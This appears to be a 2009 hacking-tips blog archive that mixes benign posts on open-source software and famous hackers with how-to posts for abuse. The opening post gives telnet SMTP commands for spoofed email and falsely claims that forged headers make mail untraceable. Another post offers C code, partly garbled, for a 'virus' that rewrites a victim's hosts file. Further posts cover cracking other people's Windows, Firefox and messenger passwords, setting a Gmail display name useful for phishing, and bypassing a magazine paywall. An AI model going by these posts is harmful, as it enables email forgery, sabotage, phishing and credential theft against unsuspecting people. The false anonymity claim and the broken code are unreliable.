Heres a few links, but as always be aware that these sites may not be here forever or their content may change. Searching for "SMTP servers" or "SMTP server list" should produce effective results.

http://www.gr0w.com/help/email_help_smtp_servers.htm
http://www.uic.edu/depts/accc/ecomm/smtpmove/isps.html
http://www.thebestfree.net/free/freesmtp.htm
http://www.registerdirect.co.nz/help/smtp_servers.html
http://www.bu.edu/pcsc/email/remote/smtplist.html

Once you've selected a server, open the command prompt, and type:
telnet xxxxxx.com 25

(Obviously replace the x's with the SMTP server you've selected) now type the following:

HELO targetsmailserver.com
MAIL FROM: whoever@whatever.com
RCPT TO: target@address.com
DATA
from: whoever@whatever.com
to: target@address.com
subject: whatever
received: xxx.xxx.xxx.xxx
x-header: xxx.xxx.xxx.xxx
The body of the message goes here.

*Note 1: Remember to end with "." on a line by itself as directed.

*Note 2: Adding x-header and received allows you to alter the IP information found in the headers of the mail, making it untracable and totally anonymous**

*Note 3: There are ISPs that have port 25 (SMTP) blocked. Be sure your settings and ISP allow connections to port 25. If all else fails, get the SMTP sever address from your ISP

OPEN SOURCE SOFTWARES

2009-08-17T07:37:00.000+05:30

Open source software (OSS) began as a marketing campaign for free software.OSS can be defined as computer software for which the human-readable source code is made available under a copyright license (or arrangement such as the public domain) that meets the Open Source Definition. This permits users to use, change, and improve the software, and to redistribute it in modified or unmodified form. It is very often developed in a public, collaborative manner. Open source software is the most prominent example of open source development and often compared to user generated content.
Open Source Softwares have following main advantages:
#Users should be treated as co-developers
#Early releases
The first version of the software should be released as early as possible so as to increase one’s chances of finding co-developers early.
#Frequent integration
New code should be integrated as often as possible so as to avoid the overhead of fixing a large number of bugs at the end of the project life cycle. Some open source projects have nightly builds where integration is done automatically on a daily basis.
#Several versions
There should be at least two versions of the software. There should be a buggier version with more features and a more stable version with fewer features. The buggy version (also called the development version) is for users who want the immediate use of the latest features, and are willing to accept the risk of using code that is not yet thoroughly tested. The users can then act as co-developers, reporting bugs and providing bug fixes.
#High modularization
The general structure of the software should be modular allowing for parallel development.
#Dynamic decision making structure
There is a need for a decision making structure, whether formal or informal, that makes strategic decisions depending on changing user requirements and other factors. Cf. Extreme programming.
Most well known OSS products include projects such as Linux, Firefox, Apache, the GNU Compiler Collection, and Perl to mention a few.
Linux kernel comes up with many distributions so we can download it through the distribution’s site such as http://www.fedoraproject.org
PHP: PHP hypertext pre-processor can be downloaded from www.php.net/downloads.php
Apache: One of the most famous HTTP server http://httpd.apache.org/download.cgi
Mozilla Firefox, The most commonly used and best Explorer http://www.getfirefox.com
Pidgin: A multi-protocol instant messenger formerly known as GAIM http://www.pidgin.im/download/
MySQL: one of the leading database management program http://dev.mysql.com/downloads/

HACK FIREFOX MASTER PASSWORD

2009-08-13T09:06:00.001+05:30

Firefox uses master password to provide enhanced security by protecting the stored sign-on information for various websites. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.

So if you have lost the master password, then you have lost all the stored credentials as well.

After doing some work on Firefox master password,I found a way to reset the password and also a way to crack the master password.

There's a simple way on how to reset the Firefox master password.
1. Run Firefox browser.
2. At the address bar, type the following link and hit Enter.
chrome://pippki/content/resetpassword.xul

3. You will be prompted "If you reset your master password, all your stored web and e-mail passwords, form data, personal certificates, and private keys will be forgotten. Are you sure you want to reset your master password?".

4. Click "Reset" button and it will reset all your stored credentials.

Resetting the master password is rather useless since you'll be loosing all your saved login information. I can easily create a new profile that won't have a master password.

There's another way you can recover Firefox master password but it requires time, a good dictionary file and also a little bit of luck. FireMaster is the Firefox master password recovery tool. It uses various methods such as dictionary, hybrid and brute force techniques to recover the master password from the Firefox key database file.

FireMaster is DOS base. So you need to understand and know the commands to use FireMaster. FireMaster is designed with good intention to prevent any master password related problems faced by Firefox users.

Download FireMaster

Now you know that Firefox Master Password can't be easily decrypted. If you have a lot of saved login information in your Firefox, make sure you set a Master Password! Don't wait until someone set a master password on your Firefox browser and then you'll searching for ways to decrypt it.Or some one hack your all information .

ALL POPULAR MAGAZINE ABSOLUTLY FREE

2009-08-13T08:39:00.000+05:30

This is a very simple & non-geeky trick to help you read the latest issue of popular magazines like PC Magazine, MIT Technology Review, Popular Mechanics, Mac World, Lonely Planet, Reader’s Digest, etc without paying any subscription charges.

You will also get to read adult magazines like Playboy and Penthouse. Best of all, these digital magazines are exact replicas of print and served as high-resolution images that you can also download on to the computer for offline reading

Step 1: If you are on a Windows PC, go to apple.com and download the Safari browser. Mac users already have Safari on their system.

Step 2: Once you install Safari, go to Edit -> Preferences -> Advanced and check the option that says "Show Develop menu in menu bar."

Step 3: Open the "Develop" option in the browser menu bar and choose Mobile Safari 1.1.3 -(or any one of the safari) iPhone as the User Agent.

Step 4: You’re all set. Open zinio.com/iphone inside Safari browser and start reading your favorite magazines for free. Use the navigation arrows at the top to turn pages.

For people in countries like India who are already subscribed to Zinio Digital Magazines, this hack is still useful because you get access to certain magazines which are otherwise not available for subscription via Zinio.

Geeks may write a AutoHotKey script or create a "scrolling capture" profile in SnagIt that will auto-flip magazine pages and save all the images locally.

UNABLE TO SEE HIDDEN FILES

2009-08-13T06:14:00.001+05:30

We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’.
It happens due to a small bug/virus which edits the Registry to create trouble for us.
Here is how we can solve it :
☻ [Theoretical Way]
Go to Registry Edit
[Start -> Run -> type "regedit"]
Browse to :
“HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder
\Hidden\SHOWALL”
and set the value of the key “Checked Value” as 1
☻ [Practical Way]
Open notepad,
copy paste the following [between start and stop]:
// START
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\
Folder\Hidden]
“Text”=”@shell32.dll,-30499″
“Type”=”group”
“Bitmap”=hex(2):25,00,53,00,79,00,73,00, 74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
00,25,00,5c,00,73,00,79,00,73,00,74,00, 65,00,6d,00,33,00,32,00,5c,00,53,00,\
48,00,45,00,4c,00,4c,00,33,00,32,00,2e, 00,64,00,6c,00,6c,00,2c,00,34,00,00,\
00
“HelpID”=”shell.hlp#51131″
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN]
“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30501″
“Type”=”radio”
“CheckedValue”=dword:00000002
“ValueName”=”Hidden”
“DefaultValue”=dword:00000002
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51104″
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL]
“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30500″
“Type”=”radio”
“CheckedValue”=dword:00000001
“ValueName”=”Hidden”
“DefaultValue”=dword:00000002
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51105″
// STOP
Save it as whatever_u_want.reg
Double Click on that file to solve the problem,
it can be carried, mailed or kept as back-up too.
(Please remove the space in between registry entries)

WORLD TOP HACKER

2009-08-11T04:32:00.007+05:30

BLACK HAT HACKER

Black-hat is a term in computing for someone who compromises the security of a system without permission from an authorized party, usually with the intent of accessing computers connected to the network. The term white hat is used for a person who is ethically opposed to the abuse of computer systems. The term cracker was coined by Richard Stallman to provide an alternative to using the existing word hacker for this meaning. The somewhat similar activity of defeating copy prevention devices in software which may or may not be legal in a country’s laws is actually software cracking.

1)Kevin Mitnick:

A self-proclaimed “hacker poster boy,” Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as “the most wanted computer criminal in United States history.” His exploits were detailed in two movies: Freedom Downtime and Takedown.
Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation’s computer network and stealing software.
Mitnick’s mischief got serious when he went on a two and a half year “coast-to-coast hacking spree.” The CNN article, “Legendary computer hacker released from prison,” explains that “he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system.” He then hacked into computer expert and fellow hacker Tsutomu Shimomura’s home computer, which led to his undoing.
Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.

2)Jonathan James:

James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, “I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off.”
James’ major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive e-mails and capture employee usernames and passwords.
James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, “The code itself was crappy . . .certainly not worth $1.7 million like they claimed.”
Given the extent of his intrusions, if James, also known as “c0mrade,” had been an adult he likely would have served at least ten years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he’s learned his lesson and might start a computer security company.

3)Adrian Lamo:

Lamo’s claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”
Lamo’s intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it’s legal. What Lamo did is not.
When he broke into The New York Times’ intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times’ LexisNexis account to research high-profile subject matter.
For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

4)Kevin Poulsen:

Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Law enforcement dubbed him “the Hannibal Lecter of computer crime.”
Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.
His hacking specialty, however, revolved around telephones. Poulsen’s most famous hack, KIIS-FM, was accomplished by taking over all of the station’s phone lines. In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.
Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.

5)Robert Tappan Morris:

Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500.
Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.

6)Vladimir Levin:

Mass media claimed at the time he was a mathematician and had a degree in biochemistry from Saint Petersburg State Institute of Technology.According to the coverage, in 1994 Levin accessed the accounts of several large corporate customers of Citibank via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in Finland, the United States, the Netherlands, Germany and Israel.In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name ArkanoiD a memorandum on popular Provider.net.ru website dedicated to telecom market. According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).

7)Donald Lloyd:

In human terms, it’s a case of a trusted, 11-year employee gone bad. Lloyd built the Novell NetWare computer network at Omega South and then blew it up with a software time bomb after he fell from corporate grace and was ultimately fired for performance and behavioral problems. Today, he faces a sentence of up to five years in prison.
In a business sense, the loss of its key manufacturing programs cost Omega, which builds measurement and instrumentation devices for customers like NASA and the U.S. Navy, more than $10 million, dislodged its footing in the industry and eventually led to 80 layoffs.
The 1996 incident set off an intense investigation that brought together the U.S. Secret Service and one of the world’s top data recovery and forensics experts to piece together the evidence that would ultimately lead to Lloyd’s arrest and conviction.

8)David Smith:

David Smith, the author of the Melissa virus, was facing nearly 40 years in jail when he decided to cooperate with the FBI. Facing jail time, public wrath and a fortune in potential fines, the 30-year-old sender of the fast-spreading Melissa computer virus did what hundreds of criminals have done before. He agreed to go undercover. Federal court documents unsealed at the request of the Associated Press show that for almost two years, Smith – then out on bail – worked mostly full time cruising the dark recesses of the Internet while the FBI paid his tab.
What did the FBI get? A windfall of information about malicious code senders, leading directly to two major international arrests and pre-empting other attacks, according to federal prosecutors.
What did Smith get? Just 20 months in federal prison, which was about two years less than the minimum sentencing requirement, and about 38 years less than he faced when initially charged.
Sometimes it takes a thief to catch a thief, said former federal prosecutor Elliot Turrini, who handled Smith’s case and agreed to the reduced sentence.
About 63,000 viruses have rolled through the Internet, causing an estimated $65 billion in damage, but Smith is the only person to go to federal prison in the United States for sending one.

9)Michael Calce:

The computer hacker known as “Mafiaboy,” who crippled several major Internet sites including CNN, arrives in court Thursday, Jan. 18, 2001 in Montreal, Canada. He pleaded guilty on Thursday to 55 charges of mischief. The trial of the 16-year-old Montrealer, who can not be identified under Canadian law, was set to begin Thursday on 66 charges relating to attacks last year on several major Web sites, as well as security breaches of other sites at institutions such as Yale and Harvard.

10)Mark Abene:

Mark Abene (born 1972), better known by his pseudonym Phiber Optik, is a computer security hacker from New York City. Phiber Optik was once a member of the Hacker Groups Legion of Doom and Masters of Deception. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems.
Phiber Optik was a high-profile hacker in the early 1990s, appearing in The New York Times, Harper’s, Esquire, in debates and on television. Phiber Optik is an important figure in the 1995 non-fiction book Masters of Deception — The Gang that Ruled Cyberspace.

WHITE HAT HACKER

Hackers that use their skills for good are classified as "white hat." These white hats often work as certified "Ethical Hackers," hired by companies to test the integrity of their systems. Others, operate without company permission by bending but not breaking laws and in the process have created some really cool stuff. In this section we profile five white hat hackers and the technologies they have developed.

1)Stephen Wozniak:

"Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. He has been awarded with the National Medal of Technology as well as honorary doctorates from Kettering University and Nova Southeastern University. Additionally, Woz was inducted into the National Inventors Hall of Fame in September 2000.
Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.
Wozniak dropped out of college and came up with the computer that eventually made him famous. Jobs had the bright idea to sell the computer as a fully assembled PC board. The Steves sold Wozniak's cherished scientific calculator and Jobs' VW van for capital and got to work assembling prototypes in Jobs' garage. Wozniak designed the hardware and most of the software. In the Letters section of Woz.org, he recalls doing "what Ed Roberts and Bill Gates and Paul Allen did and tons more, with no help." Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz no longer works full time for Apple, focusing primarily on philanthropy instead. Most notable is his function as fairy godfather to the Los Gatos, Calif. School District. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."

2)Tim Berners-Lee:

Berners-Lee is famed as the inventor of the World Wide Web, the system that we use to access sites, documents and files on the Internet. He has received numerous recognitions, most notably the Millennium Technology Prize.
While a student at Oxford University, Berners-Lee was caught hacking access with a friend and subsequently banned from University computers. w3.org reports, "Whilst [at Oxford], he built his first computer with a soldering iron, TTL gates, an M6800 processor and an old television." Technological innovation seems to have run in his genes, as Berners-Lee's parents were mathematicians who worked on the Manchester Mark1, one of the earliest electronic computers.
While working with CERN, a European nuclear research organization, Berners-Lee created a hypertext prototype system that helped researchers share and update information easily. He later realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and - ta-da! - the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.

3)Linus Torvalds:

Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."

4)Richard Stallman:

Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along - one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.

5)Tsutomu Shimomura:

Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.

CREATE COMPUTER VIRUS WHICH BLOCK WEBSITES

2009-08-10T02:14:00.003+05:30

Today I will show you how to create a virus using the c lang this is the basic language that every one knows mostly.First i will tell you how to compile the c programs so that u can compile the c virus.I will show to how to make a simple virus to block the websites.

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)>

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

5. Delete all such entries which contain the names of blocked sites.

How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.

http://www.codegear.com/downloads/free/cppbuilder

2. After you download, run freecommandlinetools.exe. The default installation path would be

C:\Borland\BCC55

How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents

2. Open the first New Text Document.txt file and add the following two lines into it

-I”c:\Borland\Bcc55\include”

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.

3. Open the second New Text Document (2).txt file and add the following line into it

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.

4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.

How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location

C:\Borland\BCC55\Bin

2. Now goto command prompt (Start->Run->type cmd->Enter)

3. Make the following path as the present working directory (use CD command)

C:\Borland\BCC55\Bin

4. To compile the file (example.c) use the following command

bcc32 example.c

5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).

6. Now you have successfully compiled the source code into an executable file(.exe file).

NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

VULNERABILITY IN GMAIL

2009-08-05T06:48:00.000+05:30

Gmail is one of the major web mail service provider across the globe. But as we all know Gmail still carries that 4 letter word BETA. Sometimes we may wonder, why Gmail is still in the testing stage even after years of it’s emergence. Here is one small reason for that.
Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the term Gmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.

This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phishing or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combination.

First Name Last Name

Gmail Team

Google Team

Gmail Password Assistance

From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing it’s services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.
1. Login to your Gmail account and click on Settings.
2. Select Accounts tab
3. Click on edit info
4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!
Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot

Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.

MEASURE THE NUMBER OF PAGE VIEWS ON ANY SITE

2009-08-05T06:18:00.000+05:30

Statbrain is a online web stats tools that helps you guess the number of page views on any site using a combination of Alexa rank, backlink counts from Google, Yahoo and some other unknown factors.

Don’t expect it to be too accurate, but if you want a very rough estimate for any site, this could be useful.
This could be very handy for advertisers or people who are interested in measuring rough traffic on a competitor’s website.
You may also want to checkout Google Trends as they are pretty accurate.
StatBrain gives an estimate about number of visits and not unique visitors or page views.

MOST EASIEST WAY TO LOCK ANY FOLDER IN WINDOWS XP

2009-08-04T23:51:00.000+05:30

Dirlock is the simplest and most easiest way to lock any folder in Windows XP using NTFS volume.

DirLock is designed for users who keep their computer turned on/logged in for others to use it.
So by using this application you will be able to lock individual folders instead of just locking the whole computer.

The user interface of DirLock is quite simple.Just right click any folder and click on lock/unlock and a pop up menu like above will ask you for password and thats it.

It provides you fairly straightforward way of protecting folders, and this freeware should suit the needs of most casual computer users and its simple and easy to use, no hassles or anything like that...

It's easy to use...but in starting you may get confused.
There is no Help file available to understand the functionality of this application.
And the last thing is that I don't know..if I forget the Password...how can I recover it.

You need to have Microsoft.NET Framework Version 2.0 installed in your system for running DirLock1.4

Related Links: Download DirLock1.4

RECOVER GMAIL, AOL,YAHOO OR WINDOWS LIVE PASSWORDS

2009-08-04T17:31:00.000+05:30

MessenPass is a free password cracking tool that will easily reveal passwords of your AOL, Yahoo! Messenger, Google Talk, MSN or any other instant messenger clients.

Since most messengers (like Google Talk or Yahoo! Messenger) require the same username / password combination to login as the mail account, MessenPass can effectively be used to recover your (or someone else's) Google Account, AOL or Yahoo! Mail password.

MessenPass works only if you have selected the "Remember Password" setting while logging into your messenger program. It detects the Instant Messenger applications installed on your computer, decrypts the passwords they store, and displays all user name/password pairs in a text or Excel file.

This may be a useful but quite dangerous tool as well - it's so small that it can run off your USB drive and requires no installation .

The only workaround is to deselect the "Remember password" while starting your IM client. MessenPass doesn't crack Skype or Hotmail passwords yet.

Download MessenPass [IM Password Recovery Software]

HACK ADMIN PASSWORD ANY OPERATING SYSTEM

2009-08-02T03:04:00.000+05:30

Now you can hack the admin password of any operating system using OPHCRACK.

What is Ophcrack?

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features:
* » Runs on Windows, Linux/Unix, Mac OS X, ...
* » Cracks LM and NTLM hashes.
* » Free tables available for Windows XP and Vista.
* » Brute-force module for simple passwords.
* » Audit mode and CSV export.
* » Real-time graphs to analyze the passwords.
* » LiveCD available to simplify the cracking.
* » Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
* » Free and open source software (GPL).

How to use?
Simple. Just download the .iso file. It is a live cd. Burn the file to a cd and boot the system you want to hack with it.

CLICK HERE TO START [XP] [412 MB]

CLICK HERE TO START [VISTA] [493 MB]

ONLINE FILE CONVERTER

2009-07-29T17:08:00.000+05:30

Convert anything
File types supported:
Sound:wav, mp3, wma, ogg, aac, amr, flac, mpc, mmf, au, aiff, qcp, mp4, vqf, 3gp, mobile ring tones polyphonic.
